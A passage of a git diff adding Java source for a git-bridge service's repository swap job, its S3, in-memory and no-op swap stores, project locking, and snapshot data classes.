uk.ac.ic.wlgitbridge.bridge.swap.job; + +/* + * Created by winston on 24/08/2016. + */ +public class NoopSwapJob implements SwapJob { + + @Override + public void start() {} + + @Override + public void stop() {} + + @Override + public void evict(String projName) {} + + @Override + public void restore(String projName) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJob.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJob.java new file mode 100644 index 0000000..8afaf17 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJob.java @@ -0,0 +1,124 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +import java.io.IOException; +import java.util.Optional; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by winston on 20/08/2016. + */ +public interface SwapJob { + + enum CompressionMethod { + Bzip2, + Gzip + } + + static CompressionMethod stringToCompressionMethod(String compressionString) { + if (compressionString == null) { + return null; + } + CompressionMethod result; + switch (compressionString) { + case "gzip": + result = CompressionMethod.Gzip; + break; + case "bzip2": + result = CompressionMethod.Bzip2; + break; + default: + result = null; + break; + } + return result; + } + + static String compressionMethodAsString(CompressionMethod compressionMethod) { + if (compressionMethod == null) { + return null; + } + String result; + switch (compressionMethod) { + case Gzip: + result = "gzip"; + break; + case Bzip2: + result = "bzip2"; + break; + default: + result = null; + break; + } + return result; + } + + static SwapJob fromConfig( + Optional<SwapJobConfig> cfg, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore) { + if (!cfg.isPresent()) { + return new NoopSwapJob(); + } + if (!swapStore.isSafe() && !cfg.get().getAllowUnsafeStores()) { + Log.warn( + "Swap store '{}' is not safe; disabling swap job", swapStore.getClass().getSimpleName()); + return new NoopSwapJob(); + } + return new SwapJobImpl(cfg.get(), lock, repoStore, dbStore, swapStore); + } + + /* + * Starts the swap job, which should schedule an attempted swap at the given + * configured interval (config["swapJob"]["intervalMillis"] + */ + void start(); + + /* + * Stops the stop job. + */ + void stop(); + + /* + * Called by the swap job when a project should be evicted. + * + * Pre: + * 1. projName must be in repoStore + * 2. projName should not be in swapStore + * 3. projName should be PRESENT in dbStore (last_accessed is not null) + * + * Acquires the project lock and performs an eviction of projName. + * + * Post: + * 1. projName should not in repoStore + * 2. projName must be in swapStore + * 3. projName must be SWAPPED in dbStore (last_accessed is null) + * @param projName + * @throws IOException + */ + void evict(String projName) throws IOException; + + /* + * Called on a project when it must be restored. + * + * Pre: + * 1. projName should not be in repoStore + * 2. projName must be in swapStore + * 3. projName must be SWAPPED in dbStore (last_accessed is null) + * + * Acquires the project lock and restores projName. + * + * Post: + * 1. projName must be in repoStore + * 2. projName should not in swapStore + * 3. projName should be PRESENT in dbStore (last_accessed is not null) + * @param projName + * @throws IOException + */ + void restore(String projName) throws IOException; +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobConfig.java new file mode 100644 index 0000000..369bf5c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobConfig.java @@ -0,0 +1,63 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +import uk.ac.ic.wlgitbridge.bridge.swap.job.SwapJob.CompressionMethod; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by winston on 23/08/2016. + */ +public class SwapJobConfig { + + private final int minProjects; + private final int lowGiB; + private final int highGiB; + private final long intervalMillis; + private final String compressionMethod; + private final boolean allowUnsafeStores; + + public SwapJobConfig( + int minProjects, + int lowGiB, + int highGiB, + long intervalMillis, + String compressionMethod, + boolean allowUnsafeStores) { + this.minProjects = minProjects; + this.lowGiB = lowGiB; + this.highGiB = highGiB; + this.intervalMillis = intervalMillis; + this.compressionMethod = compressionMethod; + this.allowUnsafeStores = allowUnsafeStores; + } + + public int getMinProjects() { + return minProjects; + } + + public int getLowGiB() { + return lowGiB; + } + + public int getHighGiB() { + return highGiB; + } + + public long getIntervalMillis() { + return intervalMillis; + } + + public boolean getAllowUnsafeStores() { + return allowUnsafeStores; + } + + public SwapJob.CompressionMethod getCompressionMethod() { + CompressionMethod result = SwapJob.stringToCompressionMethod(compressionMethod); + if (result == null) { + Log.info( + "SwapJobConfig: un-supported compressionMethod '{}', default to 'bzip2'", + compressionMethod); + result = CompressionMethod.Bzip2; + } + return result; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImpl.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImpl.java new file mode 100644 index 0000000..7101f8a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImpl.java @@ -0,0 +1,245 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.IOException; +import java.io.InputStream; +import java.sql.Timestamp; +import java.time.Duration; +import java.time.LocalDateTime; +import java.util.ArrayList; +import java.util.Timer; +import java.util.concurrent.atomic.AtomicInteger; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.TimerUtils; + +/* + * Created by winston on 20/08/2016. + */ +public class SwapJobImpl implements SwapJob { + + private static final long GiB = (1l << 30); + + int minProjects; + long lowWatermarkBytes; + long highWatermarkBytes; + Duration interval; + + private final ProjectLock lock; + private final RepoStore repoStore; + private final DBStore dbStore; + private final SwapStore swapStore; + private final CompressionMethod compressionMethod; + + private final Timer timer; + + final AtomicInteger swaps; + + public SwapJobImpl( + SwapJobConfig cfg, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore) { + this( + cfg.getMinProjects(), + GiB * cfg.getLowGiB(), + GiB * cfg.getHighGiB(), + Duration.ofMillis(cfg.getIntervalMillis()), + cfg.getCompressionMethod(), + lock, + repoStore, + dbStore, + swapStore); + } + + SwapJobImpl( + int minProjects, + long lowWatermarkBytes, + long highWatermarkBytes, + Duration interval, + CompressionMethod method, + ProjectLock lock, + RepoStore repoStore, + DBStore dbStore, + SwapStore swapStore) { + this.minProjects = minProjects; + this.lowWatermarkBytes = lowWatermarkBytes; + this.highWatermarkBytes = highWatermarkBytes; + this.interval = interval; + this.compressionMethod = method; + this.lock = lock; + this.repoStore = repoStore; + this.dbStore = dbStore; + this.swapStore = swapStore; + timer = new Timer(); + swaps = new AtomicInteger(0); + } + + @Override + public void start() { + timer.schedule(TimerUtils.makeTimerTask(this::doSwap), 0); + } + + @Override + public void stop() { + timer.cancel(); + } + + private void doSwap() { + try { + doSwap_(); + } catch (Throwable t) { + Log.warn("Exception thrown during swap job", t); + } + timer.schedule(TimerUtils.makeTimerTask(this::doSwap), interval.toMillis()); + } + + private void doSwap_() { + ArrayList<String> exceptionProjectNames = new ArrayList<String>(); + + Log.debug("Running swap number {}", swaps.get() + 1); + long totalSize = repoStore.totalSize(); + Log.debug("Size is {}/{} (high)", totalSize, highWatermarkBytes); + if (totalSize < highWatermarkBytes) { + Log.debug("No need to swap."); + swaps.incrementAndGet(); + return; + } + int numProjects = dbStore.getNumProjects(); + // while we have too many projects on disk + while ((totalSize = repoStore.totalSize()) > lowWatermarkBytes + && (numProjects = dbStore.getNumUnswappedProjects()) > minProjects) { + // check if we've had too many exceptions so far + if (exceptionProjectNames.size() >= 20) { + StringBuilder sb = new StringBuilder(); + for (String s : exceptionProjectNames) { + sb.append(s); + sb.append(' '); + } + Log.error( + "Too many exceptions while running swap, giving up on this run: {}", sb.toString()); + break; + } + // get the oldest project and try to swap it + String projectName = dbStore.getOldestUnswappedProject(); + try { + evict(projectName); + } catch (Exception e) { + Log.warn("[{}] Exception while swapping, mark project and move on", projectName, e); + // NOTE: this is something of a hack. If a project fails to swap we get stuck in a + // loop where `dbStore.getOldestUnswappedProject()` gives the same failing project over and + // over again, + // which fills up the disk with errors. By touching the access time we can mark the project + // as a + // non-candidate for swapping. Ideally we should be checking the logs for these log events + // and fixing + // whatever is wrong with the project + dbStore.setLastAccessedTime(projectName, Timestamp.valueOf(LocalDateTime.now())); + exceptionProjectNames.add(projectName); + } + } + if (totalSize > lowWatermarkBytes) { + Log.warn("Finished swapping, but total size is still too high."); + } + Log.debug( + "Size: {}/{} (low), " + + "{} (high), " + + "projects on disk: {}/{}, " + + "min projects on disk: {}", + totalSize, + lowWatermarkBytes, + highWatermarkBytes, + numProjects, + dbStore.getNumProjects(), + minProjects); + swaps.incrementAndGet(); + } + + /* + * @see SwapJob#evict(String) for high-level description. + * + * 1. Acquires the project lock. + * 2. Gets a bz2 stream and size of a project from the repo store, or throws + * 3. Uploads the bz2 stream and size to the projName in the swapStore. + * 4. Sets the last accessed time in the dbStore to null, which makes our + * state SWAPPED + * 5. Removes the project from the repo store. + * @param projName + * @throws IOException + */ + @Override + public void evict(String projName) throws IOException { + Preconditions.checkNotNull(projName, "projName was null"); + Log.info("Evicting project: {}", projName); + try (LockGuard __ = lock.lockGuard(projName)) { + try { + repoStore.gcProject(projName); + } catch (Exception e) { + Log.error("[{}] Exception while running gc on project: {}", projName, e); + } + long[] sizePtr = new long[1]; + try (InputStream blob = getBlobStream(projName, sizePtr)) { + swapStore.upload(projName, blob, sizePtr[0]); + String compression = SwapJob.compressionMethodAsString(compressionMethod); + if (compression == null) { + throw new RuntimeException("invalid compression method, should not happen"); + } + dbStore.swap(projName, compression); + repoStore.remove(projName); + } + } catch (CannotAcquireLockException e) { + Log.warn("[{}] Cannot acquire project lock, skipping swap", projName); + return; + } + Log.info("Evicted project: {}", projName); + } + + private InputStream getBlobStream(String projName, long[] sizePtr) throws IOException { + if (compressionMethod == CompressionMethod.Gzip) { + return repoStore.gzipProject(projName, sizePtr); + } else if (compressionMethod == CompressionMethod.Bzip2) { + return repoStore.bzip2Project(projName, sizePtr); + } else { + throw new RuntimeException("invalid compression method, should not happen"); + } + } + + /* + * @see SwapJob#restore(String) for high-level description. + * + * 1. Acquires the project lock. + * 2. Gets a bz2 stream for the project from the swapStore. + * 3. Fully downloads and places the bz2 stream back in the repo store. + * 4. Sets the last accessed time in the dbStore to now, which makes our + * state PRESENT and the last project to be evicted. + * @param projName + * @throws IOException + */ + @Override + public void restore(String projName) throws IOException { + try (LockGuard __ = lock.lockGuard(projName)) { + try (InputStream zipped = swapStore.openDownloadStream(projName)) { + String compression = dbStore.getSwapCompression(projName); + if (compression == null) { + throw new RuntimeException( + "Missing compression method during restore, should not happen"); + } + if ("gzip".equals(compression)) { + repoStore.ungzipProject(projName, zipped); + } else if ("bzip2".equals(compression)) { + repoStore.unbzip2Project(projName, zipped); + } + swapStore.remove(projName); + dbStore.restore(projName); + } + } catch (CannotAcquireLockException e) { + throw new RuntimeException(e); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStore.java new file mode 100644 index 0000000..3c7ae01 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStore.java @@ -0,0 +1,49 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import java.io.ByteArrayInputStream; +import java.io.IOException; +import java.io.InputStream; +import java.util.HashMap; +import java.util.Map; +import org.apache.commons.io.IOUtils; + +/* + * Created by winston on 23/08/2016. + */ +public class InMemorySwapStore implements SwapStore { + + private final Map<String, byte[]> store; + + public InMemorySwapStore() { + store = new HashMap<>(); + } + + public InMemorySwapStore(SwapStoreConfig __) { + this(); + } + + @Override + public void upload(String projectName, InputStream uploadStream, long contentLength) + throws IOException { + store.put(projectName, IOUtils.toByteArray(uploadStream, contentLength)); + } + + @Override + public InputStream openDownloadStream(String projectName) { + byte[] buf = store.get(projectName); + if (buf == null) { + throw new IllegalArgumentException("no such project in swap store: " + projectName); + } + return new ByteArrayInputStream(buf); + } + + @Override + public void remove(String projectName) { + store.remove(projectName); + } + + @Override + public boolean isSafe() { + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/NoopSwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/NoopSwapStore.java new file mode 100644 index 0000000..b607b48 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/NoopSwapStore.java @@ -0,0 +1,28 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import java.io.ByteArrayInputStream; +import java.io.InputStream; + +/* + * Created by winston on 24/08/2016. + */ +public class NoopSwapStore implements SwapStore { + + public NoopSwapStore(SwapStoreConfig __) {} + + @Override + public void upload(String projectName, InputStream uploadStream, long contentLength) {} + + @Override + public InputStream openDownloadStream(String projectName) { + return new ByteArrayInputStream(new byte[0]); + } + + @Override + public void remove(String projectName) {} + + @Override + public boolean isSafe() { + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStore.java new file mode 100644 index 0000000..34e87db --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStore.java @@ -0,0 +1,64 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import com.amazonaws.auth.AWSStaticCredentialsProvider; +import com.amazonaws.auth.BasicAWSCredentials; +import com.amazonaws.services.s3.AmazonS3; +import com.amazonaws.services.s3.AmazonS3ClientBuilder; +import com.amazonaws.services.s3.model.*; +import java.io.InputStream; + +/* + * Created by winston on 21/08/2016. + */ +public class S3SwapStore implements SwapStore { + + private final AmazonS3 s3; + + private final String bucketName; + + public S3SwapStore(SwapStoreConfig cfg) { + this(cfg.getAwsAccessKey(), cfg.getAwsSecret(), cfg.getS3BucketName(), cfg.getAwsRegion()); + } + + S3SwapStore(String accessKey, String secret, String bucketName, String region) { + String regionToUse = null; + if (region == null) { + regionToUse = "us-east-1"; + } else { + regionToUse = region; + } + s3 = + AmazonS3ClientBuilder.standard() + .withRegion(regionToUse) + .withCredentials( + new AWSStaticCredentialsProvider(new BasicAWSCredentials(accessKey, secret))) + .build(); + this.bucketName = bucketName; + } + + @Override + public void upload(String projectName, InputStream uploadStream, long contentLength) { + ObjectMetadata metadata = new ObjectMetadata(); + metadata.setContentLength(contentLength); + PutObjectRequest put = new PutObjectRequest(bucketName, projectName, uploadStream, metadata); + PutObjectResult res = s3.putObject(put); + } + + @Override + public InputStream openDownloadStream(String projectName) { + GetObjectRequest get = new GetObjectRequest(bucketName, projectName); + S3Object res = s3.getObject(get); + return res.getObjectContent(); + } + + @Override + public void remove(String projectName) { + DeleteObjectRequest del = new DeleteObjectRequest(bucketName, projectName); + s3.deleteObject(del); + } + + @Override + public boolean isSafe() { + return true; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStore.java new file mode 100644 index 0000000..3cf7cf2 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStore.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import java.io.IOException; +import java.io.InputStream; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; +import java.util.function.Function; + +/* + * Created by winston on 20/08/2016. + */ +public interface SwapStore { + + Map<String, Function<SwapStoreConfig, SwapStore>> swapStores = + new HashMap<String, Function<SwapStoreConfig, SwapStore>>() { + + { + put("noop", NoopSwapStore::new); + put("memory", InMemorySwapStore::new); + put("s3", S3SwapStore::new); + } + }; + + static SwapStore fromConfig(Optional<SwapStoreConfig> cfg) { + SwapStoreConfig cfg_ = cfg.orElse(SwapStoreConfig.NOOP); + String type = cfg_.getType(); + return swapStores.get(type).apply(cfg_); + } + + void upload(String projectName, InputStream uploadStream, long contentLength) throws IOException; + + InputStream openDownloadStream(String projectName); + + void remove(String projectName); + + /* + * Returns true if the swap store safely persists swapped projects. + * + * Fake swap stores should return false. + */ + boolean isSafe(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStoreConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStoreConfig.java new file mode 100644 index 0000000..d0cc806 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStoreConfig.java @@ -0,0 +1,64 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +/* + * Created by winston on 24/08/2016. + */ +public class SwapStoreConfig { + + public static final SwapStoreConfig NOOP = new SwapStoreConfig("noop", null, null, null, null); + + private String type; + private String awsAccessKey; + private String awsSecret; + private String s3BucketName; + private String awsRegion; + + public SwapStoreConfig() {} + + public SwapStoreConfig( + String awsAccessKey, String awsSecret, String s3BucketName, String awsRegion) { + this("s3", awsAccessKey, awsSecret, s3BucketName, awsRegion); + } + + SwapStoreConfig( + String type, String awsAccessKey, String awsSecret, String s3BucketName, String awsRegion) { + this.type = type; + this.awsAccessKey = awsAccessKey; + this.awsSecret = awsSecret; + this.s3BucketName = s3BucketName; + this.awsRegion = awsRegion; + } + + public String getType() { + return type; + } + + public String getAwsAccessKey() { + return awsAccessKey; + } + + public String getAwsSecret() { + return awsSecret; + } + + public String getS3BucketName() { + return s3BucketName; + } + + public String getAwsRegion() { + return awsRegion; + } + + public SwapStoreConfig sanitisedCopy() { + return new SwapStoreConfig( + type, + awsAccessKey == null ? null : "<awsAccessKey>", + awsSecret == null ? null : "<awsSecret>", + s3BucketName, + awsRegion); + } + + public static SwapStoreConfig sanitisedCopy(SwapStoreConfig swapStore) { + return swapStore == null ? null : swapStore.sanitisedCopy(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/util/CastUtil.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/util/CastUtil.java new file mode 100644 index 0000000..079b485 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/util/CastUtil.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.bridge.util; + +import com.google.common.base.Preconditions; + +/* + * Created by winston on 01/07/2017. + */ +public class CastUtil { + + public static int assumeInt(long l) { + Preconditions.checkArgument( + l <= (long) Integer.MAX_VALUE && l >= (long) Integer.MIN_VALUE, + l + " cannot fit inside an int"); + return (int) l; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CandidateSnapshot.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CandidateSnapshot.java new file mode 100644 index 0000000..52689b8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CandidateSnapshot.java @@ -0,0 +1,130 @@ +package uk.ac.ic.wlgitbridge.data; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.File; +import java.io.IOException; +import java.util.LinkedList; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class CandidateSnapshot implements AutoCloseable { + + private final String projectName; + private final int currentVersion; + private final List<ServletFile> files; + private final List<String> deleted; + private File attsDirectory; + + public CandidateSnapshot( + String projectName, + int currentVersion, + RawDirectory directoryContents, + RawDirectory oldDirectoryContents) { + this.projectName = projectName; + this.currentVersion = currentVersion; + files = diff(directoryContents, oldDirectoryContents); + deleted = deleted(directoryContents, oldDirectoryContents); + } + + private List<ServletFile> diff( + RawDirectory directoryContents, RawDirectory oldDirectoryContents) { + List<ServletFile> files = new LinkedList<ServletFile>(); + Map<String, RawFile> fileTable = directoryContents.getFileTable(); + Map<String, RawFile> oldFileTable = oldDirectoryContents.getFileTable(); + for (Entry<String, RawFile> entry : fileTable.entrySet()) { + RawFile file = entry.getValue(); + files.add(new ServletFile(file, oldFileTable.get(file.getPath()))); + } + return files; + } + + private List<String> deleted(RawDirectory directoryContents, RawDirectory oldDirectoryContents) { + List<String> deleted = new LinkedList<String>(); + Map<String, RawFile> fileTable = directoryContents.getFileTable(); + for (Entry<String, RawFile> entry : oldDirectoryContents.getFileTable().entrySet()) { + String path = entry.getKey(); + RawFile newFile = fileTable.get(path); + if (newFile == null) { + deleted.add(path); + } + } + return deleted; + } + + public void writeServletFiles(File rootGitDirectory) throws IOException { + attsDirectory = new File(rootGitDirectory, ".wlgb/atts/" + projectName); + for (ServletFile file : files) { + if (file.isChanged()) { + file.writeToDiskWithName(attsDirectory, file.getUniqueIdentifier()); + } + } + } + + public void deleteServletFiles() throws IOException { + if (attsDirectory != null) { + Util.deleteDirectory(attsDirectory); + } + } + + public JsonElement getJsonRepresentation(String postbackKey) { + String projectURL = Util.getPostbackURL() + "api/" + projectName; + JsonObject jsonObject = new JsonObject(); + jsonObject.addProperty("latestVerId", currentVersion); + jsonObject.add("files", getFilesAsJson(projectURL, postbackKey)); + jsonObject.addProperty("postbackUrl", projectURL + "/" + postbackKey + "/postback"); + return jsonObject; + } + + private JsonArray getFilesAsJson(String projectURL, String postbackKey) { + JsonArray filesArray = new JsonArray(); + for (ServletFile file : files) { + filesArray.add(getFileAsJson(file, projectURL, postbackKey)); + } + return filesArray; + } + + private JsonObject getFileAsJson(ServletFile file, String projectURL, String postbackKey) { + JsonObject jsonFile = new JsonObject(); + jsonFile.addProperty("name", file.getPath()); + if (file.isChanged()) { + String identifier = file.getUniqueIdentifier(); + String url = projectURL + "/" + identifier + "?key=" + postbackKey; + jsonFile.addProperty("url", url); + } + return jsonFile; + } + + public String getProjectName() { + return projectName; + } + + public List<String> getDeleted() { + return deleted; + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(); + sb.append("VersionId: "); + sb.append(currentVersion); + sb.append(", files: "); + sb.append(files); + sb.append(", deleted: "); + sb.append(deleted); + return sb.toString(); + } + + @Override + public void close() throws IOException { + deleteServletFiles(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CannotAcquireLockException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CannotAcquireLockException.java new file mode 100644 index 0000000..e28af65 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CannotAcquireLockException.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.data; + +public class CannotAcquireLockException extends Exception { + String projectName; + + public CannotAcquireLockException() { + super("Another operation is in progress. Please try again later."); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/LockAllWaiter.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/LockAllWaiter.java new file mode 100644 index 0000000..ae67da2 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/LockAllWaiter.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.data; + +/* + * Created by Winston on 21/02/15. + */ +public interface LockAllWaiter { + + void threadsRemaining(int threads); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ProjectLockImpl.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ProjectLockImpl.java new file mode 100644 index 0000000..0d5475d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ProjectLockImpl.java @@ -0,0 +1,96 @@ +package uk.ac.ic.wlgitbridge.data; + +import java.util.HashMap; +import java.util.Map; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 20/11/14. + */ +public class ProjectLockImpl implements ProjectLock { + + private final Map<String, Lock> projectLocks; + private final ReentrantReadWriteLock rwlock; + private final Lock rlock; + private final ReentrantReadWriteLock.WriteLock wlock; + private LockAllWaiter waiter; + private boolean waiting; + + public ProjectLockImpl() { + projectLocks = new HashMap<String, Lock>(); + rwlock = new ReentrantReadWriteLock(); + rlock = rwlock.readLock(); + wlock = rwlock.writeLock(); + waiting = false; + } + + public ProjectLockImpl(LockAllWaiter waiter) { + this(); + setWaiter(waiter); + } + + @Override + public void lockForProject(String projectName) throws CannotAcquireLockException { + Log.debug("[{}] taking project lock", projectName); + Lock projectLock = getLockForProjectName(projectName); + try { + if (!projectLock.tryLock(5, TimeUnit.SECONDS)) { + Log.debug("[{}] failed to acquire project lock", projectName); + throw new CannotAcquireLockException(); + } + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + Log.debug("[{}] taking reentrant lock", projectName); + rlock.lock(); + Log.debug("[{}] taken locks", projectName); + } + + @Override + public void unlockForProject(String projectName) { + Log.debug("[{}] releasing project lock", projectName); + getLockForProjectName(projectName).unlock(); + Log.debug("[{}] releasing reentrant lock", projectName); + rlock.unlock(); + Log.debug("[{}] released locks", projectName); + if (waiting) { + Log.debug("[{}] waiting for remaining threads", projectName); + trySignal(); + } + } + + private void trySignal() { + int threads = rwlock.getReadLockCount(); + Log.debug("-> waiting for {} threads", threads); + if (waiter != null && threads > 0) { + waiter.threadsRemaining(threads); + } + Log.debug("-> finished waiting for threads"); + } + + public void lockAll() { + Log.debug("-> locking all threads"); + waiting = true; + trySignal(); + Log.debug("-> locking reentrant write lock"); + wlock.lock(); + } + + private synchronized Lock getLockForProjectName(String projectName) { + Lock lock = projectLocks.get(projectName); + if (lock == null) { + lock = new ReentrantLock(); + projectLocks.put(projectName, lock); + } + return lock; + } + + public void setWaiter(LockAllWaiter waiter) { + this.waiter = waiter; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ServletFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ServletFile.java new file mode 100644 index 0000000..acf12f9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ServletFile.java @@ -0,0 +1,48 @@ +package uk.ac.ic.wlgitbridge.data; + +import java.util.UUID; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; + +/* + * Created by Winston on 21/02/15. + */ +public class ServletFile extends RawFile { + + private final RawFile file; + private final boolean changed; + private String uuid; + + public ServletFile(RawFile file, RawFile oldFile) { + this.file = file; + this.uuid = UUID.randomUUID().toString(); + changed = !equals(oldFile); + } + + public String getUniqueIdentifier() { + return uuid; + } + + @Override + public String getPath() { + return file.getPath(); + } + + @Override + public byte[] getContents() { + return file.getContents(); + } + + @Override + public long size() { + return getContents().length; + } + + public boolean isChanged() { + return changed; + } + + @Override + public String toString() { + return getPath(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/GitDirectoryContents.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/GitDirectoryContents.java new file mode 100644 index 0000000..cc53c98 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/GitDirectoryContents.java @@ -0,0 +1,76 @@ +package uk.ac.ic.wlgitbridge.data.filestore; + +import java.io.File; +import java.io.IOException; +import java.util.Date; +import java.util.List; +import uk.ac.ic.wlgitbridge.data.model.Snapshot; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 14/11/14. + */ +public class GitDirectoryContents { + + private final List<RawFile> files; + private final File gitDirectory; + private final String userName; + private final String userEmail; + private final String commitMessage; + private final Date when; + + public GitDirectoryContents( + List<RawFile> files, + File rootGitDirectory, + String projectName, + String userName, + String userEmail, + String commitMessage, + Date when) { + this.files = files; + this.gitDirectory = new File(rootGitDirectory, projectName); + this.userName = userName; + this.userEmail = userEmail; + this.commitMessage = commitMessage; + this.when = when; + } + + public GitDirectoryContents( + List<RawFile> files, File rootGitDirectory, String projectName, Snapshot snapshot) { + this( + files, + rootGitDirectory, + projectName, + snapshot.getUserName(), + snapshot.getUserEmail(), + snapshot.getComment(), + snapshot.getCreatedAt()); + } + + public void write() throws IOException { + Util.deleteInDirectoryApartFrom(gitDirectory, ".git"); + for (RawFile fileNode : files) { + fileNode.writeToDisk(gitDirectory); + } + } + + public File getDirectory() { + return gitDirectory; + } + + public String getUserName() { + return userName; + } + + public String getUserEmail() { + return userEmail; + } + + public String getCommitMessage() { + return commitMessage; + } + + public Date getWhen() { + return when; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawDirectory.java 